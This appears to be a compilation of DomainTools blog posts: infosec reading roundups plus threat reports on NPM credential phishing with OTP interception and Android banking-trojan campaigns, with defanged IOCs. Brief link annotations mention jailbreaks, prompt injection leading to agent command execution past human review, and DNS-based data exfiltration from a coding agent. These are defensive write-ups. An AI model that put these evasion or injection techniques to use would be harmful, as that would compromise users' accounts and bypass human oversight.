Infosec, know thyself. 

It’s no surprise that I’m an advocate for deeply introspective paths. My autism positions me for rumination (and much overthinking), but also self-examination and self-evaluation in order to identify strengths to capitalize on and inefficiencies to drum out. In talks I give on autism in cybersecurity with my good friend and work partner from the TechOps side, we emphasize engaging in substantive evaluation of your own thinking, reactions, and sensitivities in relation to your work and environment. 

At the right dose, self-reflection can be a superpower all its own, as well as enable more superpowers in its wake. 

When cybersecurity professionals become vulnerable enough to engage in metacognitive and other reflection in public, it makes us all better defenders. One good example can often be found amidst Tricia Howard’s work over at Akamai - whether she’s writing on resilience, toxicity and mental health, and more. 

The recent example I want to really amplify here, though, is a great piece from the folks at SpyCloud published on Halloween: It All Counts: From Small Wins to Global Takedowns, How Being Mission-Driven and Curious Influences Cybersecurity Investigations for Good. 

You had me at “mission-driven”; after all, the RAND study quote on neurodivergents being essential for national security due to “missions that are too important and too difficult to be left to those who use their brains only in typical ways” is deeply resonant with me. You also had me at “curious” - every investigation I approach, I do so with a natural sense of curiosity that makes it all the richer. But SpyCloud’s piece revolving around their investigators sitting down to talk brains and wins provides even more insight.

From connecting threat actor motivation to behavior and likely evolution, to being able to influence threat actor decision-making in impactful ways, and motivating the team itself by empowering curiosity and impacting justice in the wider world, the conversation speaks deeply to me about critical lessons for our profession, and our industry. 

To quote the piece, “iron sharpens iron, and together we get better.”

Let’s work together to form and maintain the sharpening blocks we need to make 2026 the worst year for threat actors on record.

Let’s go. 

Articles

GreyNoise Intelligence - When Bulletproof Hosting Proves Bulletproof: The Stark Industries Shell Game - Excellent, brief article from Greynoise’ boB Rudis with clear technical observations to evaluate sanctions on Stark. We need more of this, and we need to prioritize review of our current enforcement methods. More on this to come…

KrebsOnSecurity - Aisuru Botnet Shifts from DDoS to Residential Proxies - Aisuru’s power boggles the mind, as seen in this recent BleepingComputer article, but its evolution is even more interesting. Some of its roots appear to spring from Minecraft disputes, others to embarrass the Chinese Communist party. And the move to offer residential proxy access is not a welcome development.

BBC - A Chinese firm bought an insurer for CIA agents - part of Beijing's trillion dollar spending spree - This should perhaps precipitate a much wider review of PRC-owned assets with deep data insights on critical American sectors. Data is now national security-critical infrastructure. 

DomainTools Investigations - APT35 Internal Leak of Hacking Campaigns Against Lebanon, Kuwait, Turkey, Saudi Arabia, Korea, and Domestic Iranian Targets - From us last week, another natsec deep dive. I’m always fascinated by structural differences between threat actor groups, especially nation-state ones. In this case, it’s the regimented and almost rigid structure, contrasted with more flexible APT schemas.

CISA - Bulletproof Defense: Mitigating Risks From Bulletproof Hosting Providers - Overdue, but a good starting reference on BPH. Necessary to highlight CISA’s advice here on ASN blocking, an absolutely critical feature that many commercial products lack. Looking at you here, Palo. 

NYT - Cryptographers Held an Election. They Can’t Decrypt the Results. - Turns out someone lost the key. Ironic but relatable - there but for the grace of Shamir go I. 

TechCrunch - CrowdStrike fires ‘suspicious insider’ who passed information to hackers - Going to be interesting to see if charges are filed - opening Crowdstrike up to discovery there. If I was a betting man…

Mandiant - Frontline Intelligence: Analysis of UNC1549 TTPs, Custom Tools, and Malware Targeting the Aerospace and Defense Ecosystem - Iran-nexus actor with a pretty complicated portfolio compared to some of their pals. 

Politico - Cybersecurity breach at Congressional Budget Office remains a live threat - At least it’s not the State Department this time? Smells faintly like Chinese trade espionage, but that’s entirely speculation. 

SpyCloud - October Cybercrime Update: LummaC2’s Decline, Data Theft Extortion & Hacktivist Leaks - Good roundup on a few fronts, but especially the LummaC2 update. Someone’s got Lumma in their sights, or perhaps multiple someones. 

Research Papers and Reports

Anthropic - Disrupting the first reported AI-orchestrated cyber espionage campaign - There is some ongoing controversy about this report, and understandably so. Anthropic’s reports tend to be higher-quality than the other AI firms out there, and in a narrative sense they explain their analysis well - operational tempo, request volumes, and activity patterns seem the right way to do it. But we need IOCs, TTPs, and other technical indicators as narratives are not enough. It’s worth noting that it took a while to convince any industry to share those, so here’s hoping Anthropic blazes the trail with this as well. 

arXiv - Adversarial Poetry as a Universal Single-Turn Jailbreak Mechanism in Large Language Models - This may be my favorite paper ever on LLMs. There’s something incredibly funny in the Humanities coming back to haunt a technology industry and educational system that systematically defunded and deprioritized them. 

It’s almost November, and I’m behind on my reading. 

Which isn’t anything new - I’ve been behind on my reading since about sixth grade. But the uptick in infosec-related news and activity definitely feels substantial, a crescendo building towards the end of the year, or next year’s spring offensives, or whatever’s looming over the Taiwan Strait. 

De-escalation feels like a quaint notion. The cosmic microwave background of China-nexus actor persistence and ever-present staccato of Russian organized crime and nation-state operations vie for different forms of our attention, but never our rest. 

F5 network dwell time has been reported as nearly two years; nearly two years from initial compromise to detection, making coffee every day, going through life events, picking the kids up from soccer practice, two sets of holiday parties. 

One of the things I’m stuck thinking about as the days get longer in multiple ways is time. F5 is not the only one that’s had a dwell time like that, and it’s certainly a difference from short-duration actors with more traditional criminal motives. But we’re also seeing the landscape change as Large Language Model-assisted cyber operations begin surfacing. Most uses there are in their infancy, similar to the defender usage of LLMs - still in the “horseless carriage” phase of technology, to steal a concept from Douglas Rushkoff. But they’re maturing - slow, fast, and otherwise. 

Looking back to some earlier artificial intelligence work, Google’s AlphaGo took several years to gain mastery level in the game Go, across thirty million games. AlphaZero reached mastery in 4.9 million games, and learned how to beat AlphaGo in 3 days when pitted against it adversarially. OpenAI’s DOTA2 bot amassed 45,000 years of experience in ten months’ time. This was all years ago.

I am left wondering, if AI-based cyber threat offense reaches a more mature level, what happens when you take a system that can learn centuries’ worth of lessons in days, and connect it with strategic actors whose focus is sometimes across decades. 

What does that do to time? 

And in the interests of time, let’s move on to the news and chatter. 

Several of us from DomainTools Investigations will be at CYBERWARCON in Arlington, VA on November 19th. If you’re there as well, don’t hesitate to say hello. Or tell us your secrets. 

We’re good at secrets. 

Podcasts

Three Buddy Problem - JAGS LABScon 2025 keynote: Steps to an ecology of cyber - Like last month, also from LABScon; in this case, Juan Andres Guerrero-Saade’s keynote presentation on the state of cybersecurity, how to navigate it, and what to look for next. Thirty minutes of some of the best cross-disciplinary exploration I’ve heard. 

China Talk - PLA Purges and How Xi Rules with Jon Czin -  Background and practical implementation of thinking and planning that informs the Chinese government’s operational stances. 

Lawfare - CYBERCOM Legal Conference: The Role of the Private Sector in Conflict - Reposted episode from April but a good panel on public/private work in cyber, specifically in the context of conflict.

Articles

Bloomberg - Hackers Had Been Lurking in Cyber Firm F5 Systems Since 2023 - This has been a bit of a sleeper story so far, but most of the watershed compromises haven’t been declared yet. Spent a night or three tracking possible DNS threads that roughly indicated the same time fence, but you never know until it’s out in print.

GTIG - Pro-Russia Information Operations Leverage Russian Drone Incursions into Polish Airspace - Rare (I think?) and very well-done Google Threat Intelligence piece on opportunistic hybridity in a real-world information campaign. All the notional borders we build fade into the background once feedback loops between cyber, info, and kinetic blend natively like the rest of the world. 

Infoblox - Vault Viper: High Stakes, Hidden Threats - The ubiquity of gambling alongside fraud in cyber threat intelligence is no surprise to analysts, but the interconnections and scale often astound. Infoblox doing one of those things they do so well: sketch the outline of the badness, isolate and connect clusters, and lay it all out at micro- and macro-levels. 

RecordedFuture - Dark Covenant 3.0: Controlled Impunity and Russia’s Cybercriminals - “Cybercrime in this environment cannot be understood solely as a commercial enterprise; it is also a tool of influence, a means of information acquisition, and a liability when it threatens domestic stability or undermines Russian interests.” - Fascinating deep-dive that paints a much more complex and ambiguous picture of Russian state interaction with cybercrime groups than we’re used to.

Trail of Bits - Prompt injection to RCE in AI agents - Great writeup centering around mapping and exploiting commands marked as “safe” in AI agents and thus allowed to circumvent human review. 

Ars Technica - New image-generating AIs are being used for fake expense reports - Well that’s creative. Admittedly, as a teen I pulled a dot matrix printer and Tandy out of the attic to forge my report cards (which worked great in the short term, not so much in the long term, but that’s a story for another time). 

Research Papers and Reports

arXiv - Living Off the LLM: How LLMs Will Change Adversary Tactics - Speculative paper on translating LLM proficiencies into living-off-the-land techniques for adversaries. Read, and start planning. 

Dartmouth ISTS - From Chaos To Capability: Building the US Market for Offensive Cyber - Novel research specifically around private-sector circumstances supporting government cyber operations, including current state of play, gaps, and opportunities in this largely gray area. Feels substantially different from the separate hybrid models we’re used to reading about in China and Russia, among other places. 

As one part of the broader infosec community, it’s one of our pillars within DomainTools Investigations to contribute meaningfully to collective knowledge as well as common good. We believe that doing so reinforces the fact that cybersecurity is a living ecosystem - an ecosystem of ecosystems, in fact - and thrives or withers accordingly. From Head of Investigations Daniel Schwalbe down through the ranks, we want to see a thriving ecosystem, and there’s no other way to do it than to put our money and time where our mouths are.

You’ve got to have some skin in the game.

One great example of security community activity is BSides NoVa, which happened October 10 & 11. We stepped up as a Gold sponsor alongside other great organizations to bring together a diverse group, from folks looking to enter the industry to those retired from decades in it. In addition, we submitted two talks that were accepted: my colleague Malachi Walker’s talk on cyber threats in F1 racing, and my talk on DNS and domain intelligence in investigative journalism.

BSides is more than just a professional opportunity for me - it’s a deeply personal part of my path into and within infosec. While information security and cybersecurity have always been special interests of mine, the first conference I attended where I really felt the passionate burn to be an integral part of it all was a Security BSides conference, BSides Boston 2016. I sat in Microsoft’s NERD facility (not kidding about the name!) and felt the first undeniable yearning to be doing the cool work that speakers presented, even though I could only half-follow most of it at the time.

From the smallest BSides in a local meeting hall to major events like BSides CHARM, Las Vegas, or NoVa, both the model and the reality represent some of the best our community has to offer. It fills me with pride to be part of an organization that could sponsor this event.

For my part, I was honored to speak to a full room about DomainTools’ history of enabling investigative journalists and security researchers in the community through our Grant access program. We’ve been presenting at the NICAR journalism conference for nearly a decade now, grateful that interest drives not one but two NICAR sessions. In addition to access, we’ve been providing training and investigative support and review to help journalists identify objective truths in data that inform their investigations. 

Earlier this year we provided a technical writeup on one such investigation over on our corporate blog, and the details there formed the backbone of this presentation as we demonstrated the value of both DNS records and Whois/RDAP data in unraveling layers of truths. We were also able to highlight several other places where either our data proved helpful or we collaborated with journalists and investigators directly this year alone, including CitizenLab, Reuters, and the prolific Brian Krebs. 

Slides for my presentation can be found here on Google Drive (contact me if you need them placed for download elsewhere).

In addition to the slides, I’d like to reiterate my answer to one of the Q&A questions at the end. The session participants were awesome and engaged, across all levels of familiarity with DNS and domain data, and asked excellent questions. One of the better questions was “Where do I learn how to do this kind of work?”

As my introduction slide notes, I’ve got no degrees and no certifications. I cannot speak to higher education or training programs. What I can say is that learning from the folks actually doing the work is key. There are very few areas in which I have so much knowledge that I can claim to be a subject matter expert (which troubles me sometimes as far as both impact and career go). But where I excel is identifying work that I want to be doing, finding the people already doing it, and reverse-engineering their processes to build my own. In practice, this looks like not just reading investigations from Brian Krebs, Shelby Grossman, Renee Diresta, CitizenLab, or Infoblox’ Threat Intel team, but actually writing down and analyzing each step of their investigation to learn where and how they pivot from one piece of data to another, as well as areas they focus on as often fruitful investigatory avenues. 

Another great source is journalist Craig Silverman, who devotes his time to teaching other journalists how to dive deep digitally. In addition, pay attention to the various places where Yael Grauer pops up, from Consumer Reports and the Associated Press to DEF CON, especially around privacy or public interest/technology & integrity issues. 

Learn from folks doing the work - and then change, adapt, iterate, and customize it. Make it your own.

And go make a splash.

My thanks to BSides NoVa, its sponsors, and everyone who came to my talk or that I talked with on Saturday. We are the ecosystem. Let’s dig, share, and thrive.

Recently, a series of high profile supply chain compromises were caused by malicious code written to NPM repositories managed by stolen developer credentials. While developers of prominent NPM repositories have been targeted for many years, these events prompted CISA to release an alert due to their widespread nature. Attackers stole developer accounts through a phishing campaign involving fake NPM management and login pages. This tactic enabled them to take over accounts for malicious activity and remains one of the most common and effective methods of credential theft.

Details

NPJMS is the largest JavaScript repository, with two official domains: npmjs.com is the main site and npmjs.org is also an official NPM domain. Phishers have historically used variations of this domain to deceive users, leveraging common tactics such as typo-squatting through domains like “npnjs[.]com”, which are particularly easy to overlook when presented in lower case characters. 

Examining a recently spoofed NPM login page configuration with the domain “npmjs[.]pro” demonstrates how the attack progresses through three distinct stages, each designed to capture a piece of information or deceive the user into the next step.

Stage 1: Homepage Lure

This is the initial landing page of the phishing site, designed to build trust and initiate the login flow.

This is a relative sign-in link. On the malicious domain, clicking "Sign In" sends the user to the /login path on the attacker's server, not the legitimate npmjs[.]com. The attacker's server logs the request and serves the fake login page (Stage 2) in response.

Stage 2: Initial Credential Capture

After being funneled from the fake homepage, the user is presented with the fake login form.

The form's action="/login/" sends the submitted username and password to a script on the attacker's server. The attacker's server captures and logs the credentials. It then uses them to initiate a login attempt on the real npmjs[.]com, triggering a legitimate email OTP to be sent to the victim. At this point, the user's primary npm credentials (username and password) are compromised,and the next stage is to retrieve their MFA/OTP code.

Stage 3: MFA / OTP Code Interception

The attacker's server immediately presents a page to intercept the second-factor authentication code.

This form captures the value from the name="otp" field and sends it to the /login/email-otp endpoint on the attacker's server. The user receives a real OTP via email (triggered by the attacker), which reinforces their belief that the process is secure. The attacker's server receives the valid OTP and now possesses all information required to hijack the account.

Stage 4: Session Hijack and Evasion

This final stage is a server-side action to complete the attack. 

The attacker uses the captured credentials and OTP to establish their own authenticated session on the real npmjs[.]com, then redirects the victim to avoid suspicion. The attacker now has full, authenticated access to the victim's npm account. The victim remains unaware that their account and session have been compromised. Their browser redirects them to the real npm sign-in page, making them believe the process did not complete.

Conclusion

This detailed attack flow for credential theft and account takeover shows that classic credential harvesting tactics remain highly effective. As our reliance on shared software supply chains grows, developer vigilance has never been more important. While multi-factor authentication (MFA) is an essential defense, this example shows that OTP codes are only as secure as the domain they are entered into. Always verify the URL in your address bar before entering credentials, and consider adopting phishing-resistant MFA, like hardware security keys, to truly secure your accounts.

IOCs

The provided IOCs are recently registered typosquatted domains of NPMJS. 

‍

Starting in September 2024, a financially motivated cluster of more than 80 spoofed domain names and lure websites began targeting users with fake applications and websites themed as government tax sites, consumer banking, age 18+ social media content, and Windows assistant applications. The actor used these spoofed domains to deliver Android and Windows trojans likely for the purpose of stealing credentials or more overtly through the use of fake login pages.

Details

Windows Installation Assistant download themed websites such as the following were used to deliver Windows trojans.

ms32-download[.]pro

corp-ms32-download[.]pro

Download URL: https[:]//cozzystaysemarang[.]com/temp/winsetup-stable-windows_x86_x64_software_package_revision_final.exe

Filename: winsetup-stable-windows_x86_x64_software_package_revision_final.exe

Sha256: 3767140145cef85204ddec1285f5dc8544bfcf8ff22318c11073baaa476385fc

The same delivery domain was previously observed delivering APK files in June 2025.

APK Sha256: a83a442f930fea310d391f852385e3673d8c7128e5bbdc2b68217838c78381fa

More recent versions used a different domain with a long URL likely to hide the filename from automated security tools and, to a lesser extent, human review. The excessive spaces (%20 in URL encoding) and length may bypass some detection rules or regular expressions to match malicious patterns..

Download URL:

https[:]//fleetfedx[.]com/Installer%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20em_OtvJCxP1_installer_Win7-Win11_x86_x64.msi

SHA256: 71cd466073bf23b43111dbc68ccaf1064e737f3f9ffebfec9a6f5146af6a34b9

The download links also contain a Tracking Pixel in the on-click event: onclick="fbq('track', 'Lead');" This indicates that the attacker is running this as a campaign. They are likely using Facebook ads or other methods to drive traffic to this fake page and are tracking their "conversion rate", a metric of how many people they successfully trick into clicking the malicious download link.

Facebook Tracker Ids:

• 1354988235984551
• 690114973584418
• 1327164645166821

Additionally, a Yandex tracker was also identified in use: 97105740

Connective Tissue

Registrar

• PDR Ltd. d/b/a PublicDomainRegistry.com
• GMO Internet, Inc.

IP ISP

• BL Networks
• H2nexus Ltd
• H2.nexus Frankfurt Network

Name Server Domain

• regway[.]com

Top Level Domains

• Pro, Shop, Com, Icu, Top

Registrant Email Domains

• fviainboxes[.]com
• dropjar[.]com
• replyloop[.]com
• yopmail[.]com
• robot-mail[.]com
• protonmail[.]com

Trackers

• Facebook: 690114973584418
• Facebook: 1327164645166821
• Facebook: 1354988235984551
• Yandex: 97105740

The majority of the cluster’s domains targeted users with age 18+ themed TikTok, YouTube, and online Gambling Android applications. Other themes specifically involved several prominent consumer banks and cryptocurrency exchanges including USAA, PMC, Bloomberg, and Binance. A subset of the domains resolve fake Windows 11 Installation Assistant and TrustCon VPN application downloads. 

A breakdown of the cluster’s domain and websites by spoofed industries shows the majority are directly financially related, including the Government tax sites.

Sample screenshots of spoofed websites for malware delivery and credential harvesting:

Conclusion

This report highlights a persistent and financially motivated cybercrime operation employing common techniques, including spoofed domains and lure websites to distribute malware and harvest credentials. 

The most common lures preyed on curiosity and desire, which can override a user's normal caution. The promise of forbidden or exclusive content is a powerful social engineering tool. Subsequently, victims are often embarrassed to admit how their device was infected. They are less likely to report the malicious app to authorities, security vendors, or even their IT department, allowing the malware to persist longer and the campaign to remain undetected.

They operate with the mindset of a malicious marketing firm, prioritizing scale and conversion rates over high-level technical sophistication. The use of template-based website builders indicates a focus on rapid deployment and disposability of their infrastructure, allowing them to quickly pivot and evade takedowns, browser-based warnings, and blocklisting mechanisms.

Users are advised to exercise extreme caution when encountering unfamiliar links or download prompts, particularly those related to banking, social media, or system utilities.

IOCs

Emails

‍

Domains

The days are getting shorter, and so is the news cycle. 

It’s A Lot. 

Bright spots emerge from the pattern, and one of the brightest in a while occurred last week for me - LABScon. SentinelOne and various sponsors manage to gather nearly two hundred of the top cybersecurity folks every year to talk and listen to each other, and I was honored to be admitted this year. The agenda itself is public and tells you enough to know just what kind of impact speakers can have: human rights investigators, harassment fighters, nation-state espionage mitigators, and more. 

While a lot of it was TLP:RED, one thing I’m confident in sharing is the week showed me a community of folks intent and determined on doing good for the world. Many are positioned to follow through on that in some way and are excited to talk about it to a full room or one-on-one with a complete stranger. 

It’s a posture I’m trying hard to carry back from con and out into the world.

On another note, something I’m seeing more of that I want to flag for folks: RecordedFuture published a great report on Stark Industries workarounds to deal with EU sanctions, and Brian Krebs expanded upon it with a great post as well. 

One of the common themes in conversation alongside harder research lately has been the intermediate and long-term ineffectiveness of many of our interventions targeting malicious actors, groups, and campaigns. Takedowns are momentarily gratifying - as I’ve said before, we need to celebrate the wins where we can - but do not seem to provide longitudinal benefits. What does effective long term disruption look like, and is it feasible? What are the models, and what are the realities?

For my part, I’ve been looking at bad actors’ activities before and after US OFAC and UK OFSI sanctions to understand both preparation and reaction. Emerging from technical observables like DNS and BGP is an opaque but solid understanding that bad actors are much better at reliability engineering and disaster recovery than we want to admit, from domain mirroring all the way up to anticipatory Autonomous System takeover. I’ve submitted a talk to CYBERWARCON on the topic (and hopefully it’s accepted!), but if folks reading this know of work around long-term disruption, cybersecurity-related sanctions research, or adjacent topics, I’d love to hear from you. Please shoot me an email at CSRL at domaintools[.]com. 

Podcasts

Microsoft Threat Intelligence - Stopping Domain Impersonation with AI - I know, I know, I’m tired of AI all the time too. But it’s timely and important to stay on top of. Good conversation, especially around how the problem is one of scale rather than sophistication.

Three Buddy Problem - I can’t choose between them, so you get all three Live from LABScon episodes. 

• Lindsay Freeman on tracking Wagner Group war crimes - Hearing Freeman talk about this was heartbreaking, but the work her group does around this topic is inspiring. Deep, dark OSINT
  
• Visi Stark shares memories of creating the APT1 report - If nothing else listen for the excellent and hilarious dynamic between the hosts and Stark, but also, the interview carries some great insights on the history and current state of affairs of analysis and threat intelligence.

• Aurora Johnson and Trevor Hilligoss on China's 'internet toilets' - Great interview on toxic online communities in China. Also, I second Juan on “Spycloud is ****ing awesome.” 

Articles

The Record - Ransomware gang takedowns causing explosion of new, smaller groups - Immediately thought of research we conducted with Analyst1 and Scylla Intel and presented at SLEUTHCON earlier this year. Of particular interest is the finding that disruption tends to result in smaller groups reconstituting around critical trust relationships. 

Infoblox - Deniability by Design: DNS-Driven Insights into a Malicious Ad Network - Incredibly good work by Infoblox weaving deep technical details and deep narrative into a systematic understanding of not just malicious adtech but the behavior behind it and thorough methods to fingerprint and track it. 

Morningstar - Unit 221B Raises $5M in Seed Funding To Convert Threat Intelligence into Real World Arrests - You love to see it. Congratulations to our friends at Unit 221B, who should have people throwing large piles of cash at them all the time, given how excellent their work is. 

Google TIG - Another BRICKSTORM: Stealthy Backdoor Enabling Espionage into Tech and Legal Sectors - Targeting profile prioritized “legal services, Software as a Service (SaaS) providers, Business Process Outsourcers (BPOs), and Technology.” Excellent writeup by TIG, as always.

Schneier - Surveying the Global Spyware Market - Schneier highlights two important points: that investment in spyware companies has risen lately, and the role of brokers and resellers that often go unnoticed in the chain. 

Koi Security - First Malicious MCP in the Wild - Thousands of downloads a week and it’s copying every email to the dev’s personal server. Because the S in MCP stands for Security!

CSO - Why domain-based attacks will continue to wreak havoc - The dangerousness of these attacks long predated AI, including at scale, but this is a pretty good review of some domain attacks to take note of and ensure you’ve worked into your defenses and simulations.

Group-IB - Mapping the Infrastructure and Malware Ecosystem of MuddyWater - Not always the biggest fan of Group-IB, but indicators are indicators, and there’s some good work here about how Muddy Water’s tradecraft is evolving.

Microsoft - Microsoft seizes 338 websites to disrupt rapidly growing ‘RaccoonO365’ phishing service - Joint work between Microsoft DCU and Health-ISAC, highlighting the role RaccoonO365 has adopted in targeting the healthcare sector.

Research Papers and Reports

arXiv - Large Language Models for Security Operations Centers: A Comprehensive Survey - Not ground-breaking, but some valuable LLM/SOC fundamentals covered here.

Entertainment

GadgetReview - Massive Attack Turns Concert Into Facial Recognition Surveillance Experiment - Massive Attack hasn’t commented on data retention from the event, laying bare the ambiguity and lack of agency that goes unseen in all the other applications. A+

Since approximately August 2024, a group has been targeting Indonesian and Vietnamese Android users with banking trojans disguised as legitimate payment and government identity applications. The operators exhibit distinct domain registration patterns, often reusing TLS certificates and grouping domains to resolve to the same IP addresses, with a strong operational focus during Eastern Asia's daytime hours.

Details

The pattern was initially identified through the monitoring of suspicious site elements such as those associated to Google Play Store http.html:"VfPpkd-jY41G-V67aGc" that may suggest spoofed Play store websites for malware delivery. 

icrossingappxyz[.]com

The page contains fake buttons for Google Play Store and App Store application downloads. Clicking the Google Play starts an on-page download progression bar and then prompts for a file store download location on device. The Apple App Store link was nonfunctional.

The site uses an obfuscation wrapper with Socket.IO library, which enables real-time, bidirectional communication with a server. This is highly abnormal for a download page. Instead of linking directly to a file download, when a user clicks the Android button, it initiates a WebSocket connection: socket.emit('startDownload', ...). The server responds by sending the .apk file back to the browser in many small chunks. The browser listens for these with “socket.on('chunk', (chunk) => { chunks.push(chunk); });”. As the server sends data, it also sends progress messages (downloadProgress). The script uses these to update the on-screen progress bar, making the user believe a normal download is occurring. When the server sends the “downloadComplete” message, the script combines all the chunks in memory and sets the type to 'application/vnd.android.package-archive', the MIME type for an APK file. It then creates a temporary local URL for the file and creates an invisible <a> link, pointing to the temporary file URL and programmatically clicks it. This initiates a user download prompt from the browser. 

The malicious site operators likely attempted to evade detection and hide their malware store through the elaborate download method. Network security and firewalls might be configured to block direct downloads of .apk files. However, by hiding the file transfer inside WebSocket traffic, it can often slip through undetected. Since there is no static URL pointing to the malicious file, automated security scanners that crawl websites looking for malicious links will not find it.

It is worth noting that some browsers correctly flagged these downloads as suspicious with download warning prompts such as the following:

IdentitasKependudukanDigital.apk

1f9253092c5a2abdb7bc3d93fccad85f23ce5bfde38377c792a242f045afcdb5

The file was detected as BankBot.Remo.1.origin, a previously closed source banking trojan that had its source code leaked on Russian-language forums in 2016. This has resulted in many variants.

Other much more commonplace malware delivery sites were also used such as the following spoof of M-Pajak, a tax payment app. It simply spoofs the Google App Store page and has a direct download URL to the malicious file stored on the server. Notably, the site used a mix of Thai, Vietnamese, Portuguese, and Indonesian language in the HTML code instead of dynamically inserting the correct language strings based on the visitor's Accept-Language header or GeoIP. This suggests these are template files used by unsophisticated operators. 

twmlwcs[.]cc

Download URL: https[:]//twmlwcs[.]cc/tax-app/M-Pajak.apk

M-Pajak.apk

SHA256 Hash: e9d3f6211d4ebbe0c5c564b234903fbf5a0dd3f531b518e13ef0dcc8bedc4a6d  

The downloaded file is also a loader for BankBot and is configured with the following C2 domains: 

saping.ynhqhu[.]com
aaping.ynhqhu[.]com
admin.congdichvucongdancuquocgia[.]cc
admin.outdoormovietheaters[.]com

Of the over 100 domains identified in this activity for malware distribution, there were a very limited number of variations in the spoofed content used for delivery. There were slight variations as can be seen from the following sample screenshots in addition to following the fake verification trends that have become commonplace over the past year. 

The group also has a nice habit of keeping their malware in open web directories such as the following:

Open Index of dgpyynxzb[.]com

Open Index of ykkadm[.]icu

indiemusicacademi[.]com

Domain Registration Patterns

Over the past 12 months, the actor was observed using distinct domain registration patterns. This often included the reuse of TLS certificates on two domains and grouping multiple domains to resolve to the same IP addresses. 

• ISP:
  • Alibaba
  • Scloud
  • CloudFlare
• IP Country: SG, ID
• Common Website title and page:
  • Identitas Kependudukan Digital- Apps on Google Play
• Server Type: nginx
• Nameserver:
  • share-dns[.]net 
  • cloudflare[.]com
• SSL Issuer: R10, R11, WE1
• Registrar:
  • Gname.com Pte. Ltd.

The most prolific registration patterns were the use of Alibaba ISP, Gname Registrar, and share-dns[.]net nameservers. 

Heatmaps showing the domain registration (left) and first seen DNS requests (right) with the time of day (UTC) over the year.

With the heatmaps for both domain registration and first seen DNS resolutions showing a visually similar grouping, it can also be observed that the delta relative to the domain registrations and first seen DNS requests averaged 10.5 hours over the year. This suggests the domains may be consistently operationalized quickly after registration though not nearly as rapidly as other more prominent cyber crime groups. 

The time data shows a strong grouping around eastern Asia's daytime hours, as is expected with the likely focus on targeting Indonesian and Vietnamese mobile users. It may also suggest the operators are working during the same times, if not also located in the same region.

Conclusion

The malicious operators employed some methodologies to bypass network security that might block direct downloads and prevent static URL-based security scanners from detecting the malicious files. However, it is worth noting that some browsers correctly flag these downloads as suspicious, displaying warning prompts to users and serving as a crucial line of defense for end users. Additionally, several commonplace methodologies employed prominently by less sophisticated financially-motivated groups such as spoofing Google Play Store allow for the identification of these spoofed malware delivery sites. The consistent use of Alibaba ISP, Gname Registrar, and share-dns[.]net nameservers across their operations provides a clear footprint of their infrastructure. While some spoofed sites, like twmlwcs[.]cc, show mixed language code possibly indicating template use by less sophisticated elements, the overall campaign exhibits a coordinated approach to malware delivery. Overall it is likely financially motivated and suspected of being operated by a group in the same region.

IOCs

Domains (see them on our Github as well)

Sha256 Hashes

And now we enter the belly of the beast.

Summer is in its full effect in the United States as many of us return from the surface of the sun Hacker Summer Camp in Las Vegas (covered in a separate post here). Post-BlackHat and DEF CON also arrives with an abundance of gifts for practitioners and researchers: the publication of tons of new research. As always, the items linked below aren’t intended to be a round-up but rather what caught attention internally, having stood out from the rest. 

The rest of the year looms, but not without hope. 

There are some signs that spending freezes are easing up and hiring may be easing up. Even in this heat, that’s cold comfort for those in the middle of the job hunt. It’s never been harder or more filled with frustration, dead ends, and deeper hazards like identity theft or financial scams. If you’re in a place to help, try to do what you can. 

If you’re still on the hunt, keep pushing, and get through however you can. 

Podcasts

Adversary Universe from Crowdstrike - Live at Black Hat: What’s AI Really Capable Of? - 33min - Good, grounded (but relatively upbeat) perspective on AI capabilities for both defenders and attackers. Also some interesting recent attack campaigns seen, including one with convincing multi-persona smishing threads (no evidence of AI in this latter, yet). 

CyberWire Research Saturday - Beyond the smoke screen - 22min- Excellent interview with Dr. Renee Burton of Infoblox Threat Threat Intel detailing their extensive work on the VexTrio cybercriminal group. They gave a great BlackHat briefing on this topic, and the interview is similarly compelling in both technical and behavioral aspects.

Prompt||GTFO - Youtube playlists for episodes one, two, three - ~90min each - Fascinating series of “prompt pits” in which mostly infosec practitioners get together to share use cases and experiences with AI, with a strict “no slides” rule, demos only. Not an endorsement of AI, but interesting to see how practitioners are using it, and most views involved are pretty reasonable and experience-driven. 

Articles

Infoblox - VexTrio Origin Story, Unmasked, and Inside the Robot - A three-part investigation highlighting world class-level research by Infoblox Threat Intel into the evolution, behavior, and technology of a major adtech-related spam and scam actor. Highly recommended to read all three in order to get a better idea of what you end up looking at in the wild. 

Analyst1 - Ransomware Diaries Volume 7: “I Had to Take the Guilt For Everyone” – The Kaseya Hacker Breaks His Silence - Jon DiMaggio’s DEF CON talk with Jon Fokker gripped a full theater for an hour, and the accompanying blog post is even better. There are few investigators on his level, and even fewer storytellers.

Wunderwuzzi - Claude Code: Data Exfiltration with DNS (CVE-2025-55284) - Okay. So. I’m trying to be less adversarial towards GenAI, really I am. But when you allowlist a bunch of bash commands for your autonomous agent and include DNS lookups, you clear a direct path for a long-known and well-researched data exfiltration and command & control method. And then I have to get all mad and shouty again. 

RiskyBulletin - Hackers sabotage Iranian ships at sea, again - “According to an analysis of the leaked files, the group hacked the company's network, identified all maritime communications terminals in its MySQL database, and then deployed malicious code to each ship's satellite terminal that wiped its disk storage.” 

TechCrunch - North Korean spies posing as remote workers have infiltrated hundreds of companies, says CrowdStrike - What I can’t decide is if the seeming overwhelming success of this campaign is down to good execution on the part of DPRK or the sad, sad state of enterprise security, especially whenever it causes friction in hiring processes.

Cofense - Spain TLD’s Recent Rise to Dominance - Anecdotally I’d been seeing .es show up in my investigators more lately even before reading this, and once the article crossed my desk it made more sense. 

Research Papers and Reports

Greynoise Intelligence - Early Warning Signals: When Attacker Behavior Precedes New Vulnerabilities - Greynoise looked backward and found that in 80% of cases, a spike in attempted attacks on a particular technology presaged a CVE release for that technology within six weeks. Excellent work and findings, worth reading the full report. Also covered by Research Saturday interviewing Greynoise VP of Data Science Bob Rudis (30min). 

RecordedFuture - Cloud Threat Hunting and Defense Landscape - In which Insikt Group lays out five prominent attack vectors threatening cloud environments, including details on common misconfigurations as well as logging and hunting internally.

